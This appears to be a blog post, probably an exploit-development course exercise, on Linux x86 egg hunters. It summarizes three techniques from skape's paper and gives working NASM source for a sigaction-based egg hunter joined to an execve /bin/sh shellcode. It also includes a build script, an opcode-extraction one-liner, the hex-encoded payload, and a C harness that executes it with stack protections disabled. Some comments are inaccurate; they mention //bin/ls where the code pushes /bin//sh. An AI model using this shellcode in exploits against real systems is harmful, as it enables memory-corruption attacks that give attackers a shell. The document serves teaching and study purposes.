There's little point in re-writing what was written in skapes paper however it can be summarized as follows. For the linux platform there are basically 3 ways of leveraging the egg hunter technique.
The first being using the access syscall where the egg is loaded into the EBX register since the access function takes in a pointer to the pathname as the first arguement. The value in EBX is then compared to the contents of the pointer in the EDX register. The EDX register is used to iterate through the addresses in the current page in memory. If they values dont match, it continues ina loop and increments the EDX. If the egg is found, implementation jumps to the EDX where the second stage of the payload is and begins execution.
The second way is some what similar to what we've just explained above since it also leverages the access syscall. The major difference comes in the fact that while the previous method didnt check for validity of the addresses, this one first checks for the validity of the address only after a valid address has been determined does it start doing the comparisons. Another difference in terms of the functionality is that the egg is stored in the EAX register and compared to the EDI (contents of memory stored here) using the native scasd instruction.
The final implementation is different from the previous ones in terms of speed and size in that its faster and smaller and leverages the sigaction syscall. The reason for its speed stems from the fact that while using the sigaction function, its able to search multiple addresses at a time. The logic behind this fact is that incrementing by PAGE_SIZE allows for quicker searching through invalid memory regions. This is the most common implementation of the egg hunter due to its relatively smaller size of 30bytes compared to the previous two which are 38 and 35 bytes respectively. The other advantage it has is that its search time is also lower than the previous two since it searches multiple pages at a time. Below is the egghunter code.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| global _start | |
| section .text | |
| _start: | |
| begin: | |
| or cx,0xfff ;retrieve last address in page | |
| addlbl: | |
| inc ecx ;increase ecx | |
| push byte +0x43 ;sigaction syscall number | |
| pop eax ;load sigaction syscall into eax | |
| int 0x80 ;make the call | |
| cmp al,0xf2 ;check for access violation | |
| jz start ;return to start of 0xfff | |
| mov eax,0x50905090 ;Egg being loaded into eax | |
| mov edi,ecx ;load pointer into edi register | |
| scasd ;compare values in eax and with those in edi | |
| jnz addlbl ;check whether egg has been found | |
| scasd ;continue if egg has been found | |
| jnz addlbl ;return to increase edx only if the first egg has been found | |
| jmp edi ;start of shellcode | |
| ;Marker to be searched. Must be placed at the start od the shellcode | |
| nop ; 0x90 | |
| push eax ; 0x50 | |
| nop | |
| push eax | |
| nop | |
| push eax | |
| nop | |
| push eax | |
| ; Place any shellcode here | |
| xor eax, eax ;zero out eax register | |
| cdq | |
| push eax | |
| push 0x68732f2f ;push /bin//sh onto the stack | |
| push 0x6e69622f | |
| mov ebx, esp ;because ebx points to the //bin/ls | |
| push eax ; push 32bit null terminator to the stack | |
| mov edx, esp ; empty array for envp | |
| push ebx ; address of where //bin/ls is | |
| mov ecx, esp ; this is the argv array with string ptr | |
| mov al, 11 ;syscall for execve | |
| int 0x80 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo '[+] Assembling with Nasm ... ' | |
| nasm -f elf32 -o $1.o $1.nasm | |
| echo '[+] Linking ...' | |
| ld -o $1 $1.o | |
| echo '[+] Done!' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| objdump -d shell_bind_tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' |
"\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8"
"\x90\x50\x90\x50"-----> Tag to hunt for
"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7"
The code below the tags is a basic /bin/sh shellcode and can be substituted for any other shellcode.
"\x90\x50\x90\x50"----> EggHunter tags i.e. value to be searched for (If you decide to
"\x90\x50\x90\x50" change the tag be sure to change the tag in the egghunter code too)
"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80".
We then go ahead and paste the shellcode into the c program below to test our shellcode. Compile the shellcode.c with the syntax "gcc -fno-stack-protector -z execstack shellcode.c -o shellcode" then run shellcode "./shellcode".
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| #include<string.h> | |
| unsigned char code[] = \ | |
| "paste your shellcode here"; | |
| main() | |
| { | |
| printf("Shellcode Length: %d\n", strlen(code)); | |
| int (*ret)() = (int(*)())code; | |
| ret(); | |
| } |
No comments:
Post a Comment